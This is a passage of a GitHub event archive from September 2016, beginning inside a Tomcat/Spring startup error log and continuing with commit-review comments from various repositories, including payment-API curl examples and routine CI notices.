10:38:25 PM org.apache.catalina.core.ApplicationContext log\r\nINFO: No Spring WebApplicationInitializer types detected on classpath\r\nSep 28, 2016 10:38:25 PM org.apache.catalina.core.ApplicationContext log\r\nINFO: Initializing Spring root WebApplicationContext\r\nSep 28, 2016 10:38:25 PM org.springframework.web.context.ContextLoader initWebApplicationContext\r\nINFO: Root WebApplicationContext: initialization started\r\nSep 28, 2016 10:38:25 PM org.springframework.web.context.support.XmlWebApplicationContext prepareRefresh\r\nINFO: Refreshing Root WebApplicationContext: startup date [Wed Sep 28 22:38:25 IST 2016]; root of context hierarchy\r\nSep 28, 2016 10:38:25 PM org.springframework.beans.factory.xml.XmlBeanDefinitionReader loadBeanDefinitions\r\nINFO: Loading XML bean definitions from ServletContext resource [/WEB-INF/dispatcher-servlet.xml]\r\nSep 28, 2016 10:38:25 PM org.springframework.web.context.ContextLoader initWebApplicationContext\r\nSEVERE: Context initialization failed\r\njava.lang.NoSuchMethodError: org.springframework.core.ResolvableType.forRawClass(Ljava/lang/Class;)Lorg/springframework/core/ResolvableType;\r\n\tat org.springframework.beans.factory.support.DefaultListableBeanFactory.getBeanNamesForType(DefaultListableBeanFactory.java:417)\r\n\tat org.springframework.context.support.PostProcessorRegistrationDelegate.invokeBeanFactoryPostProcessors(PostProcessorRegistrationDelegate.java:82)\r\n\tat org.springframework.context.support.AbstractApplicationContext.invokeBeanFactoryPostProcessors(AbstractApplicationContext.java:606)\r\n\tat org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:462)\r\n\tat org.springframework.web.context.ContextLoader.configureAndRefreshWebApplicationContext(ContextLoader.java:403)\r\n\tat org.springframework.web.context.ContextLoader.initWebApplicationContext(ContextLoader.java:306)\r\n\tat org.springframework.web.context.ContextLoaderListener.contextInitialized(ContextLoaderListener.java:106)\r\n\tat org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:5118)\r\n\tat org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5634)\r\n\tat org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:145)\r\n\tat org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1571)\r\n\tat org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1561)\r\n\tat java.util.concurrent.FutureTask.run(Unknown Source)\r\n\tat java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)\r\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)\r\n\tat java.lang.Thread.run(Unknown Source)\r\n\r\nSep 28, 2016 10:38:25 PM org.apache.catalina.core.StandardContext listenerStart\r\nSEVERE: Exception sending context initialized event to listener instance of class org.springframework.web.context.ContextLoaderListener\r\njava.lang.NoSuchMethodError: org.springframework.core.ResolvableType.forRawClass(Ljava/lang/Class;)Lorg/springframework/core/ResolvableType;\r\n\tat org.springframework.beans.factory.support.DefaultListableBeanFactory.getBeanNamesForType(DefaultListableBeanFactory.java:417)\r\n\tat org.springframework.context.support.PostProcessorRegistrationDelegate.invokeBeanFactoryPostProcessors(PostProcessorRegistrationDelegate.java:82)\r\n\tat org.springframework.context.support.AbstractApplicationContext.invokeBeanFactoryPostProcessors(AbstractApplicationContext.java:606)\r\n\tat org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:462)\r\n\tat org.springframework.web.context.ContextLoader.configureAndRefreshWebApplicationContext(ContextLoader.java:403)\r\n\tat org.springframework.web.context.ContextLoader.initWebApplicationContext(ContextLoader.java:306)\r\n\tat org.springframework.web.context.ContextLoaderListener.contextInitialized(ContextLoaderListener.java:106)\r\n\tat org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:5118)\r\n\tat org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5634)\r\n\tat org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:145)\r\n\tat org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1571)\r\n\tat org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1561)\r\n\tat java.util.concurrent.FutureTask.run(Unknown Source)\r\n\tat java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)\r\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)\r\n\tat java.lang.Thread.run(Unknown Source)\r\n\r\nSep 28, 2016 10:38:25 PM org.apache.catalina.core.StandardContext startInternal\r\nSEVERE: One or more listeners failed to start. Full details will be found in the appropriate container log file\r\nSep 28, 2016 10:38:26 PM org.apache.catalina.util.SessionIdGeneratorBase createSecureRandom\r\nINFO: Creation of SecureRandom instance for session ID generation using [SHA1PRNG] took [222] milliseconds.\r\nSep 28, 2016 10:38:26 PM org.apache.catalina.core.StandardContext startInternal\r\nSEVERE: Context [/shop] startup failed due to previous errors\r\nSep 28, 2016 10:38:26 PM org.apache.catalina.core.ApplicationContext log\r\nINFO: Closing Spring root WebApplicationContext\r\nSep 28, 2016 10:38:26 PM org.springframework.web.context.support.XmlWebApplicationContext doClose\r\nINFO: Closing Root WebApplicationContext: startup date [Wed Sep 28 22:38:25 IST 2016]; root of context hierarchy\r\nSep 28, 2016 10:38:26 PM org.springframework.web.context.support.XmlWebApplicationContext doClose\r\nWARNING: Exception thrown from ApplicationListener handling ContextClosedEvent\r\njava.lang.IllegalStateException: ApplicationEventMulticaster not initialized - call 'refresh' before multicasting events via the context: Root WebApplicationContext: startup date [Wed Sep 28 22:38:25 IST 2016]; root of context hierarchy\r\n\tat org.springframework.context.support.AbstractApplicationContext.getApplicationEventMulticaster(AbstractApplicationContext.java:344)\r\n\tat org.springframework.context.support.AbstractApplicationContext.publishEvent(AbstractApplicationContext.java:331)\r\n\tat org.springframework.context.support.AbstractApplicationContext.doClose(AbstractApplicationContext.java:869)\r\n\tat org.springframework.context.support.AbstractApplicationContext.close(AbstractApplicationContext.java:836)\r\n\tat org.springframework.web.context.ContextLoader.closeWebApplicationContext(ContextLoader.java:579)\r\n\tat org.springframework.web.context.ContextLoaderListener.contextDestroyed(ContextLoaderListener.java:115)\r\n\tat org.apache.catalina.core.StandardContext.listenerStop(StandardContext.java:5165)\r\n\tat org.apache.catalina.core.StandardContext.stopInternal(StandardContext.java:5829)\r\n\tat org.apache.catalina.util.LifecycleBase.stop(LifecycleBase.java:221)\r\n\tat org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:149)\r\n\tat org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1571)\r\n\tat org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1561)\r\n\tat java.util.concurrent.FutureTask.run(Unknown Source)\r\n\tat java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)\r\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)\r\n\tat java.lang.Thread.run(Unknown Source)\r\n\r\nSep 28, 2016 10:38:26 PM org.springframework.web.context.support.XmlWebApplicationContext doClose\r\nWARNING: Exception thrown from LifecycleProcessor on context close\r\njava.lang.IllegalStateException: LifecycleProcessor not initialized - call 'refresh' before invoking lifecycle methods via the context: Root WebApplicationContext: startup date [Wed Sep 28 22:38:25 IST 2016]; root of context hierarchy\r\n\tat org.springframework.context.support.AbstractApplicationContext.getLifecycleProcessor(AbstractApplicationContext.java:357)\r\n\tat org.springframework.context.support.AbstractApplicationContext.doClose(AbstractApplicationContext.java:877)\r\n\tat org.springframework.context.support.AbstractApplicationContext.close(AbstractApplicationContext.java:836)\r\n\tat org.springframework.web.context.ContextLoader.closeWebApplicationContext(ContextLoader.java:579)\r\n\tat org.springframework.web.context.ContextLoaderListener.contextDestroyed(ContextLoaderListener.java:115)\r\n\tat org.apache.catalina.core.StandardContext.listenerStop(StandardContext.java:5165)\r\n\tat org.apache.catalina.core.StandardContext.stopInternal(StandardContext.java:5829)\r\n\tat org.apache.catalina.util.LifecycleBase.stop(LifecycleBase.java:221)\r\n\tat org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:149)\r\n\tat org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1571)\r\n\tat org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1561)\r\n\tat java.util.concurrent.FutureTask.run(Unknown Source)\r\n\tat java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)\r\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)\r\n\tat java.lang.Thread.run(Unknown Source)\r\n\r\nSep 28, 2016 10:38:26 PM org.apache.catalina.startup.HostConfig deployDirectory\r\nINFO: Deploying web application directory E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\\webapps\\docs\r\nSep 28, 2016 10:38:26 PM org.apache.catalina.startup.HostConfig deployDirectory\r\nINFO: Deployment of web application directory E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\\webapps\\docs has finished in 124 ms\r\nSep 28, 2016 10:38:26 PM org.apache.catalina.startup.HostConfig deployDirectory\r\nINFO: Deploying web application directory E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\\webapps\\examples\r\nSep 28, 2016 10:38:26 PM org.apache.catalina.core.ApplicationContext log\r\nINFO: ContextListener: contextInitialized()\r\nSep 28, 2016 10:38:26 PM org.apache.catalina.core.ApplicationContext log\r\nINFO: SessionListener: contextInitialized()\r\nSep 28, 2016 10:38:26 PM org.apache.catalina.core.ApplicationContext log\r\nINFO: ContextListener: attributeAdded('org.apache.jasper.compiler.TldLocationsCache', 'org.apache.jasper.compiler.TldLocationsCache@45285312')\r\nSep 28, 2016 10:38:26 PM org.apache.catalina.startup.HostConfig deployDirectory\r\nINFO: Deployment of web application directory E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\\webapps\\examples has finished in 440 ms\r\nSep 28, 2016 10:38:26 PM org.apache.catalina.startup.HostConfig deployDirectory\r\nINFO: Deploying web application directory E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\\webapps\\host-manager\r\nSep 28, 2016 10:38:27 PM org.apache.catalina.startup.HostConfig deployDirectory\r\nINFO: Deployment of web application directory E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\\webapps\\host-manager has finished in 470 ms\r\nSep 28, 2016 10:38:27 PM org.apache.catalina.startup.HostConfig deployDirectory\r\nINFO: Deploying web application directory E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\\webapps\\manager\r\nSep 28, 2016 10:38:27 PM org.apache.catalina.startup.HostConfig deployDirectory\r\nINFO: Deployment of web application directory E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\\webapps\\manager has finished in 84 ms\r\nSep 28, 2016 10:38:27 PM org.apache.catalina.startup.HostConfig deployDirectory\r\nINFO: Deploying web application directory E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\\webapps\\ROOT\r\nSep 28, 2016 10:38:27 PM org.apache.catalina.startup.HostConfig deployDirectory\r\nINFO: Deployment of web application directory E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\\webapps\\ROOT has finished in 64 ms\r\nSep 28, 2016 10:38:27 PM org.apache.coyote.AbstractProtocol start\r\nINFO: Starting ProtocolHandler [\"http-bio-8080\"]\r\nSep 28, 2016 10:38:27 PM org.apache.coyote.AbstractProtocol start\r\nINFO: Starting ProtocolHandler [\"ajp-bio-8009\"]\r\nSep 28, 2016 10:38:27 PM org.apache.catalina.startup.Catalina start\r\nINFO: Server startup in 4216 ms\r\nSep 28, 2016 10:41:01 PM org.apache.catalina.core.StandardServer await\r\nINFO: A valid shutdown command was received via the shutdown port. Stopping the Server instance.\r\nSep 28, 2016 10:41:01 PM org.apache.coyote.AbstractProtocol pause\r\nINFO: Pausing ProtocolHandler [\"http-bio-8080\"]\r\nSep 28, 2016 10:41:01 PM org.apache.coyote.AbstractProtocol pause\r\nINFO: Pausing ProtocolHandler [\"ajp-bio-8009\"]\r\nSep 28, 2016 10:41:01 PM org.apache.catalina.core.StandardService stopInternal\r\nINFO: Stopping service Catalina\r\nSep 28, 2016 10:41:01 PM org.apache.catalina.core.ApplicationContext log\r\nINFO: SessionListener: contextDestroyed()\r\nSep 28, 2016 10:41:01 PM org.apache.catalina.core.ApplicationContext log\r\nINFO: ContextListener: contextDestroyed()\r\nSep 28, 2016 10:41:01 PM org.apache.coyote.AbstractProtocol stop\r\nINFO: Stopping ProtocolHandler [\"http-bio-8080\"]\r\nSep 28, 2016 10:41:01 PM org.apache.coyote.AbstractProtocol stop\r\nINFO: Stopping ProtocolHandler [\"ajp-bio-8009\"]\r\nSep 28, 2016 10:41:01 PM org.apache.coyote.AbstractProtocol destroy\r\nINFO: Destroying ProtocolHandler [\"http-bio-8080\"]\r\nSep 28, 2016 10:41:01 PM org.apache.coyote.AbstractProtocol destroy\r\nINFO: Destroying ProtocolHandler [\"ajp-bio-8009\"]\r\n"}},"created_at":"2016-09-28T17:22:01Z"}
{"id":"4632142324","type":"CommitCommentEvent","actor":{"login":"coding-horror"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":19211153,"position":9,"line":13,"path":"app/assets/javascripts/discourse/lib/url.js.es6","commit_id":"8871c9852c874070911ccb67c22e43a0c45ad91e","created_at":"2016-09-28T17:22:42Z","updated_at":"2016-09-28T17:22:42Z","body":"We had another change go through that whiltelists those extensions so it\nshould work.\nOn Wed, Sep 28, 2016 at 7:19 PM David Grayson <notifications@github.com>\nwrote:\n\n> Does this fix the category links and RSS feed links which were also\n> broken? Also, does this commit allow someone to host arbitrary static files\n> on their domain and link to them from forum posts?\n>\n> If not, I still suggest that any route that results in a 404 should result\n> in a full page reload in order to give the HTTP server and the back-end\n> server a chance to respond to the request.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/discourse/discourse/commit/8871c9852c874070911ccb67c22e43a0c45ad91e#commitcomment-19211092>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABc7VfVD94TL0RfZAfK61nEOAWYAl-byks5quqF3gaJpZM4KJFUP>\n> .\n>\n"}},"created_at":"2016-09-28T17:22:42Z"}
{"id":"4632145303","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19211164,"position":null,"line":null,"path":null,"commit_id":"91bf406d6a25ddace386b066764b5a6093fb5743","created_at":"2016-09-28T17:23:15Z","updated_at":"2016-09-28T17:23:15Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 279](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1256&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-28T17:23:15Z"}
{"id":"4632146034","type":"CommitCommentEvent","actor":{"login":"jamesokbo"},"repo":{"name":"jamesokbo/GroveMonitor"},"payload":{"comment":{"id":19211167,"position":4,"line":13,"path":"mainRPi/package.json","commit_id":"6cb59f9b8721eb4a2a0c05760af72527dd93da30","created_at":"2016-09-28T17:23:22Z","updated_at":"2016-09-28T17:23:22Z","body":"ejs is not needed right now, since we won't be serving a local website ATM."}},"created_at":"2016-09-28T17:23:22Z"}
{"id":"4632147962","type":"CommitCommentEvent","actor":{"login":"povi2946"},"repo":{"name":"Sensorica/Sensor-Network"},"payload":{"comment":{"id":19211173,"position":null,"line":null,"path":null,"commit_id":"7fc7099708be68d8f81309dac715ad63cd17e92a","created_at":"2016-09-28T17:23:43Z","updated_at":"2016-09-28T17:23:43Z","body":"This shouldn't be name smoothing, in previous commit I accidentally committed some changes, and in this one I reverted them back."}},"created_at":"2016-09-28T17:23:43Z"}
{"id":"4632148767","type":"CommitCommentEvent","actor":{"login":"DanielSkala"},"repo":{"name":"kagali11/Pills_Plan"},"payload":{"comment":{"id":19211175,"position":132,"line":132,"path":"app/src/main/java/revolware/pillsplan/DatabaseHandler.java","commit_id":"3410b4d96fe9c9252b1e4a8801a0d059a9866981","created_at":"2016-09-28T17:23:52Z","updated_at":"2016-09-28T17:23:52Z","body":"To je pls v ktorej aktivite? Robil to totiz to iny chalan...\n\nDňa 28. 9. 2016 19:21 používateľ \"Peter Grajcar\" <notifications@github.com>\nnapísal:\n\n> SELECT * je tu dosť zbytočné skôr by som použil niečo ako \"SELECT\n> COUNT(*) FROM \" + TABLE_DRUGS + \" AS count\" je to efektívnejšie\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/kagali11/Pills_Plan/commit/3410b4d96fe9c9252b1e4a8801a0d059a9866981#commitcomment-19211132>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARHwfCENkmdxw4KGNRTv61sMWe1SobuFks5quqH9gaJpZM4KJFdI>\n> .\n>\n"}},"created_at":"2016-09-28T17:23:52Z"}
{"id":"4632149570","type":"CommitCommentEvent","actor":{"login":"mbostock"},"repo":{"name":"mbostock/topojson"},"payload":{"comment":{"id":19211179,"position":null,"line":null,"path":null,"commit_id":"6770d3c7d41594d17865b3bebfed3a9d2b09e0e8","created_at":"2016-09-28T17:24:01Z","updated_at":"2016-09-28T17:24:01Z","body":"I’m sorry for the inconvenience. However, I have no plans to unpublish release 1.6.27 and to re-release it as 2.0.0. As I have already stated, the default export was undocumented (and undesired) behavior that was caused by a bug in Rollup."}},"created_at":"2016-09-28T17:24:01Z"}
{"id":"4632149895","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":19211182,"position":null,"line":null,"path":null,"commit_id":"9fe93205556d0144217d5cc1ba3df04c80f0a694","created_at":"2016-09-28T17:24:05Z","updated_at":"2016-09-28T17:24:05Z","body":"I think you can only setup one DM, even if you called several. Either the first get configured or the last in list. We need to check this by forcing two DMs to get installed and check the result ..."}},"created_at":"2016-09-28T17:24:05Z"}
{"id":"4632153154","type":"CommitCommentEvent","actor":{"login":"graham-lewis"},"repo":{"name":"hannonhill/Example-Sites"},"payload":{"comment":{"id":19211193,"position":null,"line":null,"path":null,"commit_id":"7def9bc9cbf6133052e8db175dab331a07cecfe5","created_at":"2016-09-28T17:24:39Z","updated_at":"2016-09-28T17:24:39Z","body":"@gjs1985 When you say \"legends\" do you mean the different Markers? Or do you mean the different categories?"}},"created_at":"2016-09-28T17:24:39Z"}
{"id":"4632153430","type":"CommitCommentEvent","actor":{"login":"jamesokbo"},"repo":{"name":"jamesokbo/GroveMonitor"},"payload":{"comment":{"id":19211195,"position":null,"line":null,"path":null,"commit_id":"d65f011e408d2186dcf79bbc181208b016fd9c03","created_at":"2016-09-28T17:24:42Z","updated_at":"2016-09-28T17:24:42Z","body":"We won't be adding anymore reading models until we test the functionality with this one"}},"created_at":"2016-09-28T17:24:42Z"}
{"id":"4632154768","type":"CommitCommentEvent","actor":{"login":"llington"},"repo":{"name":"llington/API-Paga-me"},"payload":{"comment":{"id":19211198,"position":1,"line":1,"path":"README.md","commit_id":"d5f670015d13aa1be9a29b4cf9e5464bf65d3ed6","created_at":"2016-09-28T17:24:56Z","updated_at":"2016-09-28T17:24:56Z","body":"curl -X POST 'https://api.pagar.me/1/transactions' \\\r\n    -d 'api_key=ak_test_grXijQ4GicOa2BLGZrDRTR5qNQxJW0' \\\r\n    -d 'amount=1000' \\\r\n    -d 'card_hash={CARD_HASH}' \\\r\n    -d 'postback_url=http://seusite.com/payments/2718' \\\r\n    -d 'split_rules[0][recipient_id]=re_ci7nhf1ay0007n016wd5t22nl'\r\n    -d 'split_rules[0][charge_processing_fee]=true' \\\r\n    -d 'split_rules[0][liable]=true' \\\r\n    -d 'split_rules[0][percentage]=30' \\\r\n    -d 'split_rules[1][recipient_id]=re_ci7nheu0m0006n016o5sglg9t' \\\r\n    -d 'split_rules[1][charge_processing_fee]=true' \\\r\n    -d 'split_rules[1][liable]=false' \\\r\n    -d 'split_rules[1][percentage]=70'\r\n\r\n{\r\n  \"object\": \"transaction\",\r\n  \"status\": \"processing\",\r\n  \"refuse_reason\": null,\r\n  \"status_reason\": \"acquirer\",\r\n  \"acquirer_response_code\": null,\r\n  \"authorization_code\": null,\r\n  \"soft_descriptor\": \"API-paga-me\",\r\n  \"tid\": null,\r\n  \"nsu\": null,\r\n  \"date_created\": \"2015-02-25T21:54:56.000Z\",\r\n  \"date_updated\": \"2015-02-25T21:54:56.000Z\",\r\n  \"amount\": 310000,\r\n  \"installments\": 5,\r\n  \"id\": 184220,\r\n  \"cost\": 0,\r\n  \"postback_url\": \"http://requestb.in/pkt7pgpk\",\r\n  \"payment_method\": \"credit_card\",\r\n  \"antifraud_score\": null,\r\n  \"boleto_url\": null,\r\n  \"boleto_barcode\": null,\r\n  \"boleto_expiration_date\": null,\r\n  \"referer\": \"api_key\",\r\n  \"ip\": \"189.8.94.42\",\r\n  \"subscription_id\": null,\r\n  \"phone\": null,\r\n  \"address\": null,\r\n  \"customer\": null,\r\n  \"card\": {\r\n    \"object\": \"card\",\r\n    \"id\": \"card_ci6l9fx8f0042rt16rtb477gj\",\r\n    \"date_created\": \"2015-02-25T21:54:56.000Z\",\r\n    \"date_updated\": \"2015-02-25T21:54:56.000Z\",\r\n    \"brand\": \"mastercard\",\r\n    \"holder_name\": \"Api Customer\",\r\n    \"first_digits\": \"548045\",\r\n    \"last_digits\": \"3123\",\r\n    \"fingerprint\": \"HSiLJan2nqwn\",\r\n    \"valid\": null\r\n  },\r\n  \"metadata\": {\r\n    \"idccount\": \"58054\"\r\n  }\r\n}\r\ncurl -X POST https://api.pagar.me/1/recipients \\\r\n-d 'api_key=ak_test_grXijQ4GicOa2BLGZrDRTR5qNQxJW0' \\\r\n-d 'transfer_interval=weekly' \\\r\n-d 'transfer_day=5' \\\r\n-d 'transfer_enabled=true' \\\r\n-d 'bank_account_id=4841'\r\n{\r\n    \"object\": \"recipient\",\r\n    \"id\": \"re_ci9bucss300h1zt6dvywufeqc\",\r\n    \"bank_account\": {\r\n        \"object\": \"bank_account\",\r\n        \"id\": 4841,\r\n        \"bank_code\": \"341\",\r\n        \"agencia\": \"0932\",\r\n        \"agencia_dv\": \"5\",\r\n        \"conta\": \"58054\",\r\n        \"conta_dv\": \"1\",\r\n        \"document_type\": \"cpf\",\r\n        \"document_number\": \"26268738888\",\r\n        \"legal_name\": \"API BANK ACCOUNT\",\r\n        \"charge_transfer_fees\": false,\r\n        \"date_created\": \"2016-08-19T15:40:51.000Z\"\r\n    },\r\n    \"transfer_enabled\": true,\r\n    \"last_transfer\": null,\r\n    \"transfer_interval\": \"weekly\",\r\n    \"transfer_day\": 5,\r\n    \"automatic_anticipation_enabled\": true,\r\n    \"anticipatable_volume_percentage\": 85,\r\n    \"date_created\": \"2015-05-05T21:59:48.000Z\",\r\n    \"date_updated\": \"2015-05-06T22:51:48.000Z\"\r\n}\r\n\r\ncurl -X POST https://api.pagar.me/2/recipients \\\r\n-d 'api_key=ak_test_grXijQ4GicOa2BLGZrDRTR5qNQxJW1' \\\r\n-d 'transfer_interval=weekly' \\\r\n-d 'transfer_day=12' \\\r\n-d 'transfer_enabled=true' \\\r\n-d 'bank_account_id=4855'\r\n\r\n{\r\n    \"object\": \"recipient\",\r\n    \"id\": \"re_ci9bucss300h1zt6dvywufeqc\",\r\n    \"bank_account\": {\r\n        \"object\": \"bank_account\",\r\n        \"id\": 4855,\r\n        \"bank_code\": \"341\",\r\n        \"agencia\": \"0932\",\r\n        \"agencia_dv\": \"5\",\r\n        \"conta\": \"58054\",\r\n        \"conta_dv\": \"1\",\r\n        \"document_type\": \"cpf\",\r\n        \"document_number\": \"26268738888\",\r\n        \"legal_name\": \"API BANK ACCOUNT\",\r\n        \"charge_transfer_fees\": false,\r\n        \"date_created\": \"2016-03-21T12:40:51.000Z\"\r\n    },\r\n    \"transfer_enabled\": true,\r\n    \"last_transfer\": null,\r\n    \"transfer_interval\": \"weekly\",\r\n    \"transfer_day\": 12,\r\n    \"automatic_anticipation_enabled\": true,\r\n    \"anticipatable_volume_percentage\": 85,\r\n    \"date_created\": \"2016-03-21T20:43:48.000Z\",\r\n    \"date_updated\": \"2016-03-21T21:50:48.000Z\"\r\n}\r\n\r\n\r\n\r\n\r\n[{\r\n    \"object\": \"payable\",\r\n    \"id\": 1485,\r\n    \"status\": \"paid\",\r\n    \"amount\": 39000,\r\n    \"fee\": 115,\r\n    \"installment\": null,\r\n    \"transaction_id\": 192669,\r\n    \"split_rule_id\": \"sr_ci87hce8o00083016bkniqems\",\r\n    \"payment_date\": \"2015-04-07T03:00:00.000Z\",\r\n    \"type\": \"credit\",\r\n    \"payment_method\": \"boleto\",\r\n    \"date_created\": \"2015-04-07T15:47:48.000Z\"\r\n}, {\r\n    \"object\": \"payable\",\r\n    \"id\": 1486,\r\n    \"status\": \"paid\",\r\n    \"amount\": 91000,\r\n    \"fee\": 0,\r\n    \"installment\": null,\r\n    \"transaction_id\": 192669,\r\n    \"split_rule_id\": \"sr_ci87hce8o00093016fin8p6ll\",\r\n    \"payment_date\": \"2015-04-07T03:00:00.000Z\",\r\n    \"type\": \"credit\",\r\n    \"payment_method\": \"boleto\",\r\n    \"date_created\": \"2015-04-07T15:47:48.000Z\"\r\n}]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-28T17:24:56Z"}
{"id":"4632154783","type":"CommitCommentEvent","actor":{"login":"beaglebagel"},"repo":{"name":"beaglebagel/python_tips"},"payload":{"comment":{"id":19211199,"position":6,"line":7,"path":"tips/helper.py","commit_id":"6159d6a88197afccc0fd0b4a146b662d6828394d","created_at":"2016-09-28T17:24:57Z","updated_at":"2016-09-28T17:24:57Z","body":"did this add new line?"}},"created_at":"2016-09-28T17:24:57Z"}
{"id":"4632155660","type":"CommitCommentEvent","actor":{"login":"beaglebagel"},"repo":{"name":"beaglebagel/python_tips"},"payload":{"comment":{"id":19211203,"position":6,"line":7,"path":"tips/helper.py","commit_id":"6159d6a88197afccc0fd0b4a146b662d6828394d","created_at":"2016-09-28T17:25:06Z","updated_at":"2016-09-28T17:25:06Z","body":"i guess so"}},"created_at":"2016-09-28T17:25:06Z"}
{"id":"4632155679","type":"CommitCommentEvent","actor":{"login":"rgriffith"},"repo":{"name":"hannonhill/Example-Sites"},"payload":{"comment":{"id":19211204,"position":null,"line":null,"path":null,"commit_id":"7def9bc9cbf6133052e8db175dab331a07cecfe5","created_at":"2016-09-28T17:25:06Z","updated_at":"2016-09-28T17:25:06Z","body":"@gjs1985 If you don't mind, please [create an issue](https://github.com/hannonhill/Example-Sites/issues) with your question. This will make the conversation easier to track and follow than individual commit comments."}},"created_at":"2016-09-28T17:25:06Z"}
{"id":"4632157129","type":"CommitCommentEvent","actor":{"login":"catherio"},"repo":{"name":"openai/gym"},"payload":{"comment":{"id":19211212,"position":15,"line":47,"path":"gym/envs/registration.py","commit_id":"3cd5b4038b9cae032d558348d6ed4d89e63a48cb","created_at":"2016-09-28T17:25:21Z","updated_at":"2016-09-28T17:25:21Z","body":"makes sense, refactored!"}},"created_at":"2016-09-28T17:25:21Z"}
{"id":"4632158502","type":"CommitCommentEvent","actor":{"login":"peter-grajcar-13"},"repo":{"name":"kagali11/Pills_Plan"},"payload":{"comment":{"id":19211219,"position":132,"line":132,"path":"app/src/main/java/revolware/pillsplan/DatabaseHandler.java","commit_id":"3410b4d96fe9c9252b1e4a8801a0d059a9866981","created_at":"2016-09-28T17:25:36Z","updated_at":"2016-09-28T17:25:36Z","body":"je to DatabaseHandler class\r\n"}},"created_at":"2016-09-28T17:25:36Z"}
{"id":"4632164270","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19211231,"position":null,"line":null,"path":null,"commit_id":"2b9bdecbfa0d925f2c4653d85dbcf01959d21594","created_at":"2016-09-28T17:26:41Z","updated_at":"2016-09-28T17:26:41Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=120)"}},"created_at":"2016-09-28T17:26:41Z"}
{"id":"4632164343","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19211233,"position":null,"line":null,"path":null,"commit_id":"dfd90add62d79b5d122bbc1c1da2dfd3ad8f7b39","created_at":"2016-09-28T17:26:42Z","updated_at":"2016-09-28T17:26:42Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=121)"}},"created_at":"2016-09-28T17:26:42Z"}
{"id":"4632166634","type":"CommitCommentEvent","actor":{"login":"mgedmin"},"repo":{"name":"zopefoundation/zope.testbrowser"},"payload":{"comment":{"id":19211242,"position":5,"line":18,"path":"src/zope/testbrowser/tests/test_browser.py","commit_id":"fc495606752b668f94e81987de09be044c56a7c2","created_at":"2016-09-28T17:27:08Z","updated_at":"2016-09-28T17:27:08Z","body":"Instead of this please add a `[flake8]` section in `setup.cfg` and tell it to scan doctests too."}},"created_at":"2016-09-28T17:27:08Z"}
{"id":"4632168653","type":"CommitCommentEvent","actor":{"login":"Ste74"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":19211247,"position":null,"line":null,"path":null,"commit_id":"7f2081e6e1a1000c7cf35662703b59530cb1d742","created_at":"2016-09-28T17:27:28Z","updated_at":"2016-09-28T17:27:28Z","body":"@Kirek : why pkgrel 0.x ( for my understanding ) ? i leave this notation .."}},"created_at":"2016-09-28T17:27:28Z"}
